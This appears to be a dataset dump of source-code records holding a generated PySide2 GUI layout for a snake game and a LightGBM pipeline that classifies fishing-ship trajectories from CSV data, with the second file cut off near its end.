blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
69ca0c8da13ad6bf070afc74b5c3967a6a1dff38
|
f29a90f22565d52a5c6376e96d45697cedf90506
|
/snakes_graphic.py
|
21e52880749d7ae0b10fdd8803bba7af7f03f4dc
|
[] |
no_license
|
jczapiew/hexadecimal-snake
|
e2d0ca1566d70bcb7e57b126e7cdabd8a55d3572
|
cb1e36eda559c683d4261cbe26eac745bc67ee04
|
refs/heads/main
| 2023-02-24T00:18:43.082402
| 2021-02-03T11:55:43
| 2021-02-03T11:55:43
| 324,958,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,884
|
py
|
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'snakes_GUI.ui'
##
## Created by: Qt User Interface Compiler version 5.14.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (QCoreApplication, QDate, QDateTime, QMetaObject,
QObject, QPoint, QRect, QSize, QTime, QUrl, Qt)
from PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont,
QFontDatabase, QIcon, QKeySequence, QLinearGradient, QPalette, QPainter,
QPixmap, QRadialGradient)
from PySide2.QtWidgets import *
class Ui_Snakes(object):
    """Widget layout for the Snakes main window.

    Auto-generated by the Qt UI compiler (pyside2-uic) from 'snakes_GUI.ui';
    manual edits are lost when the .ui file is recompiled.
    """

    def setupUi(self, Snakes):
        """Create and position every child widget on the `Snakes` main window."""
        if not Snakes.objectName():
            Snakes.setObjectName(u"Snakes")
        Snakes.resize(821, 546)
        self.centralwidget = QWidget(Snakes)
        self.centralwidget.setObjectName(u"centralwidget")
        # Game-control buttons (right-hand column of the window).
        self.exitButton = QPushButton(self.centralwidget)
        self.exitButton.setObjectName(u"exitButton")
        self.exitButton.setGeometry(QRect(750, 10, 61, 51))
        self.startButton = QPushButton(self.centralwidget)
        self.startButton.setObjectName(u"startButton")
        self.startButton.setGeometry(QRect(660, 80, 71, 41))
        self.onePlayer = QPushButton(self.centralwidget)
        self.onePlayer.setObjectName(u"onePlayer")
        self.onePlayer.setGeometry(QRect(650, 20, 41, 21))
        self.playersLabel = QLabel(self.centralwidget)
        self.playersLabel.setObjectName(u"playersLabel")
        self.playersLabel.setGeometry(QRect(650, 0, 101, 21))
        self.twoPlayers = QPushButton(self.centralwidget)
        self.twoPlayers.setObjectName(u"twoPlayers")
        self.twoPlayers.setGeometry(QRect(700, 20, 41, 21))
        self.resetButton = QPushButton(self.centralwidget)
        self.resetButton.setObjectName(u"resetButton")
        self.resetButton.setGeometry(QRect(740, 80, 71, 41))
        self.pauseButton = QPushButton(self.centralwidget)
        self.pauseButton.setObjectName(u"pauseButton")
        self.pauseButton.setGeometry(QRect(660, 130, 71, 41))
        # Score displays and labels for the two players.
        self.playerOnePoints = QTextEdit(self.centralwidget)
        self.playerOnePoints.setObjectName(u"playerOnePoints")
        self.playerOnePoints.setGeometry(QRect(660, 270, 51, 31))
        self.pointsLabel = QLabel(self.centralwidget)
        self.pointsLabel.setObjectName(u"pointsLabel")
        self.pointsLabel.setGeometry(QRect(710, 230, 31, 21))
        self.playerOnePointsLabel = QLabel(self.centralwidget)
        self.playerOnePointsLabel.setObjectName(u"playerOnePointsLabel")
        self.playerOnePointsLabel.setGeometry(QRect(670, 250, 39, 13))
        self.playerTwoPointsLabel = QLabel(self.centralwidget)
        self.playerTwoPointsLabel.setObjectName(u"playerTwoPointsLabel")
        self.playerTwoPointsLabel.setGeometry(QRect(730, 250, 39, 13))
        self.playerTwoPoints = QTextEdit(self.centralwidget)
        self.playerTwoPoints.setObjectName(u"playerTwoPoints")
        self.playerTwoPoints.setGeometry(QRect(730, 270, 51, 31))
        self.textEdit = QTextEdit(self.centralwidget)
        self.textEdit.setObjectName(u"textEdit")
        self.textEdit.setGeometry(QRect(660, 310, 141, 131))
        # Main play-field canvas.
        self.graphicsView = QGraphicsView(self.centralwidget)
        self.graphicsView.setObjectName(u"graphicsView")
        self.graphicsView.setGeometry(QRect(0, 0, 641, 501))
        # Multiplayer controls: connect button plus two input fields
        # (presumably host and port -- TODO confirm against the controller).
        self.button_multiplayer = QPushButton(self.centralwidget)
        self.button_multiplayer.setObjectName(u"button_multiplayer")
        self.button_multiplayer.setGeometry(QRect(670, 480, 121, 23))
        self.lineEdit = QLineEdit(self.centralwidget)
        self.lineEdit.setObjectName(u"lineEdit")
        self.lineEdit.setGeometry(QRect(650, 450, 111, 20))
        self.lineEdit_2 = QLineEdit(self.centralwidget)
        self.lineEdit_2.setObjectName(u"lineEdit_2")
        self.lineEdit_2.setGeometry(QRect(760, 450, 41, 20))
        self.replayButton = QPushButton(self.centralwidget)
        self.replayButton.setObjectName(u"replayButton")
        self.replayButton.setGeometry(QRect(740, 130, 71, 41))
        self.savejsonButton = QPushButton(self.centralwidget)
        self.savejsonButton.setObjectName(u"savejsonButton")
        self.savejsonButton.setGeometry(QRect(660, 180, 71, 41))
        self.readjsonButton = QPushButton(self.centralwidget)
        self.readjsonButton.setObjectName(u"readjsonButton")
        self.readjsonButton.setGeometry(QRect(740, 180, 71, 41))
        self.botButton = QPushButton(self.centralwidget)
        self.botButton.setObjectName(u"botButton")
        self.botButton.setGeometry(QRect(660, 50, 75, 23))
        Snakes.setCentralWidget(self.centralwidget)
        # Standard main-window chrome.
        self.menubar = QMenuBar(Snakes)
        self.menubar.setObjectName(u"menubar")
        self.menubar.setGeometry(QRect(0, 0, 821, 21))
        Snakes.setMenuBar(self.menubar)
        self.statusbar = QStatusBar(Snakes)
        self.statusbar.setObjectName(u"statusbar")
        Snakes.setStatusBar(self.statusbar)
        self.retranslateUi(Snakes)
        QMetaObject.connectSlotsByName(Snakes)
    # setupUi

    def retranslateUi(self, Snakes):
        """Apply the (translatable) display text to all widgets."""
        Snakes.setWindowTitle(QCoreApplication.translate("Snakes", u"MainWindow", None))
        self.exitButton.setText(QCoreApplication.translate("Snakes", u"Exit", None))
        self.startButton.setText(QCoreApplication.translate("Snakes", u"Start", None))
        self.onePlayer.setText(QCoreApplication.translate("Snakes", u"1", None))
        self.playersLabel.setText(QCoreApplication.translate("Snakes", u"Number of players:", None))
        self.twoPlayers.setText(QCoreApplication.translate("Snakes", u"2", None))
        self.resetButton.setText(QCoreApplication.translate("Snakes", u"Reset", None))
        self.pauseButton.setText(QCoreApplication.translate("Snakes", u"Pause", None))
        self.pointsLabel.setText(QCoreApplication.translate("Snakes", u"Points", None))
        self.playerOnePointsLabel.setText(QCoreApplication.translate("Snakes", u"Player 1", None))
        self.playerTwoPointsLabel.setText(QCoreApplication.translate("Snakes", u"Player 2", None))
        self.button_multiplayer.setText(QCoreApplication.translate("Snakes", u"Multiplayer", None))
        self.replayButton.setText(QCoreApplication.translate("Snakes", u"Replay", None))
        self.savejsonButton.setText(QCoreApplication.translate("Snakes", u"Save json", None))
        self.readjsonButton.setText(QCoreApplication.translate("Snakes", u"Read json", None))
        self.botButton.setText(QCoreApplication.translate("Snakes", u"vs. AI", None))
    # retranslateUi
|
[
"noreply@github.com"
] |
jczapiew.noreply@github.com
|
55d630b6adfebc10d5918651f00a55fd63835aa9
|
6b1356bd758b656d2afa119f0c2d0f399d157a0b
|
/model.py
|
3e713292b834e18f3f7c4444f039dd6151ab326f
|
[] |
no_license
|
Ai-Light/2020-zhihuihaiyang
|
87f22b8e94a0424b090e2f15be2047912fbdd7ce
|
0d775d8611339299a5eea2b94d4efe8ef3996977
|
refs/heads/master
| 2022-08-10T02:22:35.457007
| 2020-05-18T13:55:01
| 2020-05-18T13:55:01
| 253,509,618
| 37
| 12
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,125
|
py
|
#!/usr/bin/env python
# coding: utf-8
import gc
import pandas as pd
import numpy as np
import os
import time
import lightgbm as lgb
from copy import deepcopy
from sklearn.model_selection import StratifiedKFold
from sklearn.metrics import f1_score
from sklearn import metrics
from sklearn.metrics import precision_recall_fscore_support
import warnings
from glob import glob
from scipy.sparse import csr_matrix
# Wall-clock start, used for the runtime report at the very end of the script.
start_t = time.time()
print('ww_900_start')
pd.set_option('display.max_columns', 100)
warnings.filterwarnings('ignore')
def group_feature(df, key, target, aggs, flag):
    """Group `df` by `key` and aggregate `target` with every function in `aggs`.

    Each output column is named '<target>_<agg>_<flag>' so features from
    different data slices (flags) do not collide.  Returns a DataFrame with
    `key` plus one column per aggregation, ready to merge back onto a
    per-ship frame.
    """
    agg_dict = {'{}_{}_{}'.format(target, ag, flag): ag for ag in aggs}
    print(agg_dict)
    # Named aggregation (pandas >= 0.25): the old dict-renaming form
    # df.groupby(key)[target].agg({name: func}) raises SpecificationError
    # ("nested renamer is not supported") on pandas >= 1.0.
    t = df.groupby(key)[target].agg(**agg_dict).reset_index()
    return t
def haversine_dist(lat1, lng1, lat2, lng2):
    """Great-circle distance in kilometres between two (lat, lng) points.

    Accepts scalars or numpy arrays (degrees); vectorised via numpy.
    """
    EARTH_RADIUS_KM = 6371  # mean Earth radius
    lat1, lng1, lat2, lng2 = map(np.radians, (lat1, lng1, lat2, lng2))
    dlat = lat2 - lat1
    dlng = lng2 - lng1
    # Haversine formula.
    a = np.sin(dlat / 2) ** 2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlng / 2) ** 2
    return 2 * EARTH_RADIUS_KM * np.arcsin(np.sqrt(a))
def extract_feature(df, train, flag):
    # # speed split
    # date_nunique = df.groupby(['ship'])['speed_cat'].nunique().to_dict()
    # train['speed_cat_nunique'] = train['ship'].map(date_nunique)
    '''
    Merge per-ship aggregate statistics of one data slice onto `train`.

    df    -- point-level records restricted to one slice (all ships)
    train -- one-row-per-ship frame the features are merged onto
    flag  -- slice tag appended to every feature name: "0" (speed == 0),
             "1" (speed != 0), 'on_night' or 'on_day'
    Returns `train` with the new feature columns merged in (left join on ship).
    '''
    if (flag == 'on_night') or (flag == 'on_day'):
        # Day/night slices additionally get speed statistics.
        t = group_feature(df, 'ship','speed',['max','mean','median','std','skew'],flag)
        train = pd.merge(train, t, on='ship', how='left')
        # return train
    if flag == "0":
        # Stationary records: only the heading distribution is aggregated.
        t = group_feature(df, 'ship','direction',['max','median','mean','std','skew'],flag)
        train = pd.merge(train, t, on='ship', how='left')
    elif flag == "1":
        # Moving records: speed and heading statistics plus cardinalities.
        t = group_feature(df, 'ship','speed',['max','mean','median','std','skew'],flag)
        train = pd.merge(train, t, on='ship', how='left')
        t = group_feature(df, 'ship','direction',['max','median','mean','std','skew'],flag)
        train = pd.merge(train, t, on='ship', how='left')
        hour_nunique = df.groupby('ship')['speed'].nunique().to_dict()
        train['speed_nunique_{}'.format(flag)] = train['ship'].map(hour_nunique)
        hour_nunique = df.groupby('ship')['direction'].nunique().to_dict()
        train['direction_nunique_{}'.format(flag)] = train['ship'].map(hour_nunique)
    # Position statistics are computed for every slice.
    t = group_feature(df, 'ship','x',['max','min','mean','median','std','skew'],flag)
    train = pd.merge(train, t, on='ship', how='left')
    t = group_feature(df, 'ship','y',['max','min','mean','median','std','skew'],flag)
    train = pd.merge(train, t, on='ship', how='left')
    t = group_feature(df, 'ship','base_dis_diff',['max','min','mean','std','skew'],flag)
    train = pd.merge(train, t, on='ship', how='left')
    # Bounding-box extents and simple shape descriptors of the trajectory.
    train['x_max_x_min_{}'.format(flag)] = train['x_max_{}'.format(flag)] - train['x_min_{}'.format(flag)]
    train['y_max_y_min_{}'.format(flag)] = train['y_max_{}'.format(flag)] - train['y_min_{}'.format(flag)]
    train['y_max_x_min_{}'.format(flag)] = train['y_max_{}'.format(flag)] - train['x_min_{}'.format(flag)]
    train['x_max_y_min_{}'.format(flag)] = train['x_max_{}'.format(flag)] - train['y_min_{}'.format(flag)]
    # Guard against a zero-width bounding box before dividing.
    train['slope_{}'.format(flag)] = train['y_max_y_min_{}'.format(flag)] / np.where(train['x_max_x_min_{}'.format(flag)]==0, 0.001, train['x_max_x_min_{}'.format(flag)])
    train['area_{}'.format(flag)] = train['x_max_x_min_{}'.format(flag)] * train['y_max_y_min_{}'.format(flag)]
    # train['dis_lng_{}'.format(flag)] = list(map(haversine_dist,train['x_max_{}'.format(flag)],train['y_max_{}'.format(flag)],train['x_min_{}'.format(flag)],train['y_min_{}'.format(flag)]))
    # Most frequent hour of activity within this slice.
    mode_hour = df.groupby('ship')['hour'].agg(lambda x:x.value_counts().index[0]).to_dict()
    train['mode_hour_{}'.format(flag)] = train['ship'].map(mode_hour)
    train['slope_median_{}'.format(flag)] = train['y_median_{}'.format(flag)] / np.where(train['x_median_{}'.format(flag)]==0, 0.001, train['x_median_{}'.format(flag)])
    return train
def get_data(files, is_sort=True, sort_column="time"):
    """Read and vertically concatenate a list of CSV files.

    files       : iterable of paths or file-like objects for pd.read_csv
    is_sort     : when True, sort each frame by `sort_column` (ascending,
                  NaNs last) before concatenating
    sort_column : column name to sort on
    Returns a single DataFrame with a fresh RangeIndex.
    """
    datas = [pd.read_csv(f) for f in files]
    if is_sort:
        # Bug fix: previously the sorted frames were assigned to an unused
        # variable (`dfs`) and the unsorted originals were concatenated,
        # silently discarding the per-trajectory time ordering.
        datas = [df.sort_values(by=sort_column, ascending=True, na_position='last') for df in datas]
    df = pd.concat(datas, axis=0, ignore_index=True)
    return df
def extract_dt(df):
    """Parse timestamps and derive time/position helper columns in place.

    Adds 'date', 'hour' and 'base_dis_diff' (Euclidean distance from the
    fixed reference point (6165599, 5202660)), rescales x/y to millions of
    raw units, and flags daytime records (hours 6..19) in 'day_nig'.
    Returns the mutated frame.
    """
    df['time'] = pd.to_datetime(df['time'], format='%m%d %H:%M:%S')
    df['date'] = df['time'].dt.date
    df['hour'] = df['time'].dt.hour
    # Distance from the fixed reference coordinate, before x/y are rescaled.
    dx = (df['x'] - 6165599).abs()
    dy = (df['y'] - 5202660).abs()
    df['base_dis_diff'] = (dx ** 2 + dy ** 2) ** 0.5
    df["x"] = df["x"] / 1e6
    df["y"] = df["y"] / 1e6
    daytime = (df['hour'] > 5) & (df['hour'] < 20)
    df['day_nig'] = daytime.astype(int)
    return df
# Round-2 competition data: one CSV per ship trajectory.
train_files = glob("tcdata/hy_round2_train_20200225/*.csv")
test_files = glob("tcdata/hy_round2_testB_20200312/*.csv")
# Sort for a deterministic file order across runs/filesystems.
train_files = sorted(train_files)
test_files = sorted(test_files)
def get_data(files, is_sort=True, sort_column="time"):
    """Read and vertically concatenate a list of CSV files.

    (Duplicate definition kept for file compatibility -- it shadows the one
    above.)  files: iterable of paths/file-likes; is_sort: sort each frame
    by `sort_column` (ascending, NaNs last) before concatenating.
    Returns a single DataFrame with a fresh RangeIndex.
    """
    datas = [pd.read_csv(f) for f in files]
    if is_sort:
        # Bug fix: the sorted frames were previously assigned to an unused
        # variable while the unsorted originals were concatenated.
        datas = [df.sort_values(by=sort_column, ascending=True, na_position='last') for df in datas]
    df = pd.concat(datas, axis=0, ignore_index=True)
    return df
# Load the raw trajectories and assign canonical column names.
train = get_data(train_files)
train.columns = ['ship','x','y','speed','direction','time','type']
test = get_data(test_files)
test.columns = ['ship','x','y','speed','direction','time']
train = extract_dt(train)
test = extract_dt(test)
# One row per ship; for train the first record carries the label.
train_label = train.drop_duplicates(['ship'],keep = 'first')
test_label = test.drop_duplicates(['ship'],keep = 'first')
# Encode the Chinese class names: purse seine=0, gill net=1, trawl=2.
train_label['type'] = train_label['type'].map({'围网':0,'刺网':1,'拖网':2})
num = train_label.shape[0]
# Stack train+test so every feature is computed once over both.
data_label = train_label.append(test_label)
data =train.append(test)
# Stationary ("0") vs moving ("1") slices.
data_1 = data[data['speed']==0]
data_2 = data[data['speed']!=0]
data_label = extract_feature(data_1, data_label,"0")
data_label = extract_feature(data_2, data_label,"1")
# Night vs day slices (day_nig flag from extract_dt).
data_1 = data[data['day_nig'] == 0]
data_2 = data[data['day_nig'] == 1]
data_label = extract_feature(data_1, data_label,"on_night")
data_label = extract_feature(data_2, data_label,"on_day")
# NMF features: read from cache when present, otherwise recompute.
if os.path.isfile('nmf_testb.csv'):
    nmf_fea = pd.read_csv('nmf_testb.csv')
    data_label = data_label.merge(nmf_fea,on='ship',how = 'left')
    del nmf_fea
else:
    for j in range(1,4):
        print('********* {} *******'.format(j))
        for i in ['speed','x','y']:
            data[i + '_str'] = data[i].astype(str)
            from nmf_list import nmf_list
            nmf = nmf_list(data,'ship',i + '_str',8,2)
            nmf_a = nmf.run(j)
            data_label = data_label.merge(nmf_a,on = 'ship',how = 'left')
# Ratios between the stationary ("0") and moving ("1") slices.
first = "0"
second = "1"
data_label['direction_median_ratio'] = data_label['direction_median_{}'.format(second)] / data_label['direction_median_{}'.format(first)]
data_label['slope_ratio'] = data_label['slope_{}'.format(second)] / data_label['slope_{}'.format(first)]
data_label['slope_mean_ratio'] = data_label['slope_median_{}'.format(second)] / data_label['slope_median_{}'.format(first)]
# Ratios between the night and day slices.
first = "on_night"
second = "on_day"
data_label['speed_median_ratio'] = data_label['speed_median_{}'.format(second)] / data_label['speed_median_{}'.format(first)]
data_label['speed_std_ratio'] = data_label['speed_std_{}'.format(second)] / data_label['speed_std_{}'.format(first)]
# data_label['lat_lng_ratio'] = data_label['dis_lng_{}'.format(second)] / data_label['dis_lng_{}'.format(first)]
'''
count feature
'''
flag = 'all'
# Frequency encoding: how many ships share the same raw value.
for cc in ['direction','speed']:
    t = group_feature(data_label,cc, 'ship',['count'],flag +cc+ 'x')
    data_label = pd.merge(data_label, t, on=cc, how='left')
for i in ["0","1"]:
    if i == "1":
        for j in [
            # 'slope_speed_cat_nunique_{}'.format(i),
            # 'slope_mean_speed_cat_nunique_{}'.format(i),
            'speed_nunique_{}'.format(i),
            'direction_nunique_{}'.format(i)
            ]:
            t = group_feature(data_label,j, 'ship',['count'],j+"_count")
            data_label = pd.merge(data_label, t, on=j, how='left')
    for j in [
        'slope_median_{}'.format(i),
        # 'x_max_x_min_{}'.format(i),
        # 'y_max_y_min_{}'.format(i)
        ]:
        # t = group_feature(data_label,j, 'ship',['count'],j+"_count")
        # data_label = pd.merge(data_label, t, on=j, how='left')
        # Speed statistics across ships sharing the same slope_median value.
        t = group_feature(data_label,j, 'speed',['min','max','median','std','skew'],j+"_tongji")
        data_label = pd.merge(data_label, t, on=j, how='left')
        # t = group_feature(data_label,j, 'direction',['min','max','median','std','skew'],j+"_tongji")
        # data_label = pd.merge(data_label, t, on=j, how='left')
def cut_bins(raw_data, col_name=None, q=49):
    """Quantile-discretise `raw_data[col_name]` into at most `q` bins.

    Returns (features, bins, labels): the integer-labelled categorical
    column, the bin edges, and the list of integer labels.  Duplicate
    quantile edges are dropped, so fewer than `q` bins may result.
    """
    # First pass only determines how many distinct bin edges survive.
    _, edges = pd.qcut(raw_data[col_name], q=q, retbins=True, duplicates="drop")
    labels = list(range(len(edges) - 1))
    # Second pass produces the integer-labelled categories.
    features, bins = pd.qcut(raw_data[col_name], labels=labels, q=q, retbins=True, duplicates="drop")
    return features, bins, labels
# Quantile-discretise the continuous channels; the *_cate codes serve as
# word2vec "tokens" below.
MAX_CATE = 199
data["x_cate"], x_bins, x_labels = cut_bins(data, col_name="x", q=MAX_CATE)
data["y_cate"], y_bins, y_labels = cut_bins(data, col_name="y", q=MAX_CATE)
# data["x_sub_y_cate"], x_sub_y_bins, x_sub_y_labels = cut_bins(data, col_name="x_sub_y", q=MAX_CATE)
data["distance_cate"], dist_bins, dist_labels = cut_bins(data, col_name="base_dis_diff", q=MAX_CATE)
data["speed_cate"], speed_bins, speed_labels = cut_bins(data, col_name="speed", q=MAX_CATE)
MAX_CATE = 120
# NOTE(review): this overwrites speed_bins/speed_labels with the direction
# channel's values -- looks like a copy-paste leftover; results unaffected
# since neither variable is read again.
data["direct_cate"], speed_bins, speed_labels = cut_bins(data, col_name="direction", q=MAX_CATE)
# Word2vec embedding features over the discretised channels: read from a
# cache file when present, otherwise train the embeddings from scratch.
if os.path.isfile('emb_testb.csv'):
    w2v_fea = pd.read_csv('emb_testb.csv')
    data_label = data_label.merge(w2v_fea, on='ship', how='left')
    del w2v_fea
else:
    from gensim.models import Word2Vec
    import gc
    def emb(df, f1, f2):
        """Average word2vec embedding of each `f1` group's `f2` token sequence.

        Treats the ordered `f2` values of every `f1` group as a sentence,
        trains a CBOW model over all sentences, and returns a frame keyed
        by `f1` with `emb_size` mean-vector columns.
        """
        emb_size = 23
        print('====================================== {} {} ======================================'.format(f1, f2))
        tmp = df.groupby(f1, as_index=False)[f2].agg({'{}_{}_list'.format(f1, f2): list})
        sentences = tmp['{}_{}_list'.format(f1, f2)].values.tolist()
        del tmp['{}_{}_list'.format(f1, f2)]
        for i in range(len(sentences)):
            sentences[i] = [str(x) for x in sentences[i]]
        model = Word2Vec(sentences, size=emb_size, window=5, min_count=3, sg=0, hs=1, seed=2222)
        emb_matrix = []
        for seq in sentences:
            vec = []
            for w in seq:
                if w in model:
                    vec.append(model[w])
            if len(vec) > 0:
                emb_matrix.append(np.mean(vec, axis=0))
            else:
                # No token of this group survived min_count: zero vector.
                emb_matrix.append([0] * emb_size)
        emb_matrix = np.array(emb_matrix)
        for i in range(emb_size):
            tmp['{}_{}_emb_{}'.format(f1, f2, i)] = emb_matrix[:, i]
        del model, emb_matrix, sentences
        return tmp
    emb_cols = [
        ['ship', 'x_cate'],
        ['ship', 'y_cate'],
        ['ship', 'speed_cate'],
        ['ship', 'distance_cate'],
        # ['ship', 'direct_cate'],
    ]
    for f1, f2 in emb_cols:
        data_label = data_label.merge(emb(data, f1, f2), on=f1, how='left')
        gc.collect()
    # emb_list = ['ship']
    # for i in data_label.columns:
    #     if '_emb_' in i:
    #         emb_list.append(i)
    # data_label[emb_list].to_csv('emb_testb.csv',index=False)
print('feature done')
# Split the stacked frame back into train and test parts.
train_label = data_label[:num]
test_label = data_label[num:]
# Everything except identifiers and raw channels is a candidate feature.
features = [x for x in train_label.columns if x not in ['ship','type','time','x','y','diff_time','date','day_nig','direction','speed','hour',
            'speed_many','dire_diff','direction_str','speed_str','dis','x_speed','y_speed'] ]
target = 'type'
# print(len(features), ','.join(features))
# Drop features LightGBM finds useless (zero / low cumulative importance).
from feature_selector import FeatureSelector
fs = FeatureSelector(data = train_label[features], labels = train_label[target])
fs.identify_zero_importance(task = 'classification', eval_metric = 'multiclass',
                            n_iterations = 10, early_stopping = True)
fs.identify_low_importance(cumulative_importance = 0.97)
low_importance_features = fs.ops['low_importance']
print('====low_importance_features=====')
print(low_importance_features)
for i in low_importance_features:
    features.remove(i)
print('feature number',len(features))
gc.collect()
def macro_f1(y_hat, data):
    """LightGBM feval: macro-averaged F1 over the three classes.

    y_hat : flattened probabilities, class-major -- reshaped to
            (num_class, num_rows) and argmax'ed over classes
    data  : lgb.Dataset carrying the true labels
    Returns ('f1', score, True) -- True means higher is better.
    """
    y_true = data.get_label()
    y_hat = y_hat.reshape(-1, y_true.shape[0])
    y_hat = np.argmax(y_hat, axis=0)
    f1_multi = precision_recall_fscore_support(y_true, y_hat, labels=[0, 1, 2])[2]
    f1_macro = f1_score(y_true, y_hat, average ="macro")
    # Sanity cross-check of the two sklearn paths.  Bug fix: exact float
    # equality (==) can fail spuriously; compare with a tolerance instead.
    # NOTE(review): if a class is absent from a fold, f1_score's default
    # label set can differ from [0, 1, 2] and this check may still trip.
    assert np.isclose(np.mean(f1_multi), f1_macro)
    return 'f1', f1_macro, True
def f1_single(y_hat, data, index=0):
    """LightGBM feval: F1 score of the single class `index` (0, 1 or 2).

    Returns ('f1_<index>', score rounded to 4 decimals, True).
    """
    true_labels = data.get_label()
    # Flattened probabilities are class-major: (num_class, num_rows).
    probs = y_hat.reshape(-1, true_labels.shape[0])
    preds = np.argmax(probs, axis=0)
    per_class_f1 = precision_recall_fscore_support(true_labels, preds, labels=[0, 1, 2])[2]
    return 'f1_{}'.format(index), round(per_class_f1[index], 4), True
# Final matrices for training and inference.
train_X = train_label[features]
test_X = test_label[features]
print(train_X.shape, test_X.shape)
train_y = train_label[target]
# LightGBM settings: evaluation relies solely on the custom F1 fevals
# ('metric': 'None'); macro-F1 is listed first and drives early stopping
# via 'first_metric_only'.
params = {
    'task':'train',
    'num_leaves': 63,
    'objective': 'multiclass',
    'num_class': 3,
    'metric': 'None', # [f1_0, f1_1, f1_2],
    'min_data_in_leaf': 10,
    'learning_rate': 0.01,
    'feature_fraction': 0.7,
    'bagging_fraction': 0.95,
    'early_stopping_rounds': 2000,
    # 'lambda_l1': 0.1,
    # 'lambda_l2': 0.1,
    "first_metric_only": True,
    'bagging_freq': 3,
    'max_bin': 255,
    'random_state': 42,
    'verbose' : -1
}
models = []
test_preds = []
val_preds = []
# Out-of-fold probabilities, averaged over the random seeds below.
oof_seed = np.zeros((len(train_label), 3))
seed = [2222,2018778]
for j in seed:
    print("+++++++++++++++++ seed {} ++++++++++++".format(str(j)))
    skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=j)
    oof = np.zeros((len(train_label), 3))
    for i, (trn_idx, val_idx) in enumerate(skf.split(train_X, train_y)):
        print("-" * 81)
        print("[!] fold {}".format(i))
        lgb_params = deepcopy(params)
        # print(lgb_params)
        # Sparse matrices keep the per-fold copies cheap.
        trn_X = csr_matrix(train_X)[trn_idx]
        trn_y = train_y.iloc[trn_idx]
        val_X = csr_matrix(train_X)[val_idx]
        val_y = train_y.iloc[val_idx]
        dtrain = lgb.Dataset(trn_X, trn_y)
        dval = lgb.Dataset(val_X, val_y)
        # Huge num_boost_round; early stopping on macro-F1 decides when to stop.
        model = lgb.train(lgb_params,
                          dtrain,
                          num_boost_round=400000,
                          valid_sets=[dval],
                          feval=lambda preds, train_data: [
                              macro_f1(preds, train_data),
                              f1_single(preds, train_data, index=0),
                              f1_single(preds, train_data, index=1),
                              f1_single(preds, train_data, index=2)],
                          verbose_eval=-1)
        models.append(model)
        # print(model.best_iteration)
        val_pred = model.predict(val_X, iteration=model.best_iteration)
        oof[val_idx] = val_pred
        val_y = train_y.iloc[val_idx]
        val_pred = np.argmax(val_pred, axis=1)
        print(str(i), 'val f1', metrics.f1_score(val_y, val_pred, average='macro'))
        test_preds.append(model.predict(test_X, iteration=model.best_iteration))
        print("[!] fold {} finish\n".format(i))
        del dtrain, dval
        gc.collect()
    val_pred = np.argmax(oof, axis=1)
    print(str(j), 'every_flod val f1', metrics.f1_score(train_y, val_pred, average='macro'))
    oof_seed += oof/len(seed)
# Cross-validated macro-F1 of the seed-averaged OOF predictions.
oof1 = np.argmax(oof_seed, axis=1)
print('oof f1', metrics.f1_score(oof1,train_y, average='macro'))
val_score = np.round(metrics.f1_score(oof1, train_y, average='macro'),6)
def ensemble_predictions(predictions, weights=None, type_="linear"):
    """Blend a list of equally-shaped prediction arrays into one.

    predictions : list of numpy arrays, one per model/fold
    weights     : optional per-model weights; defaults to a uniform average
                  and is renormalised to sum to 1
    type_       : "linear" (arithmetic mean), "harmonic", "geometric",
                  or "rank" (mean of ranks rescaled to (0, 1))
    """
    if not weights:
        print("[!] AVE_WGT")
        weights = [1./ len(predictions) for _ in range(len(predictions))]
    assert len(predictions) == len(weights)
    total = np.sum(weights)
    if total != 1.0:
        # Renormalise so the weights form a convex combination.
        weights = [w / total for w in weights]
        print("[!] weights = {}".format(weights))
    assert np.isclose(np.sum(weights), 1.0)
    if type_ == "linear":
        res = np.average(predictions, weights=weights, axis=0)
    elif type_ == "harmonic":
        inverted = [1 / p for p in predictions]
        res = np.average(inverted, weights=weights, axis=0)
        return 1 / res
    elif type_ == "geometric":
        log_mean = np.average([np.log(p) for p in predictions], weights=weights, axis=0)
        return np.exp(log_mean / sum(weights))
    elif type_ == "rank":
        from scipy.stats import rankdata
        ranked = np.average([rankdata(p) for p in predictions], weights=weights, axis=0)
        return ranked / (len(ranked) + 1)
    return res
def merge(prob, number=-1, index=0):
    """Force the `number` rows most confident in class `index` to that class.

    prob   : (n_rows, 3) probability matrix; not modified (deep-copied)
    number : how many top rows to hard-assign.  NOTE: with the default -1
             the slice [:-1] keeps all rows but the LAST candidate -- pass
             an explicit positive count (the caller uses 900).
    index  : class column to rank by and hard-assign
    Rows in the top set become a one-hot vector for `index`; every other
    row gets its `index` probability zeroed so argmax picks another class.
    """
    from copy import deepcopy
    new_prob = deepcopy(prob)
    top = np.argsort(prob[:, index])[::-1][: number]
    print(top[: 4])
    # O(1) membership test instead of an O(n) array scan per row.
    top_set = set(top.tolist())
    pad_value = np.array([0, 0, 0])
    pad_value[index] = 1
    for i in range(len(new_prob)):
        if i in top_set:
            new_prob[i, ] = pad_value
        else:
            new_prob[i, index] = 0.
    return new_prob
# Average the fold/seed probabilities into the final test prediction.
test_pred_prob = ensemble_predictions(test_preds)
test_pred = test_pred_prob.argmax(axis=1)
test_pro = test_label[['ship']]
test_pro['pro_1'] = test_pred_prob[:,0]
test_pro['pro_2'] = test_pred_prob[:,1]
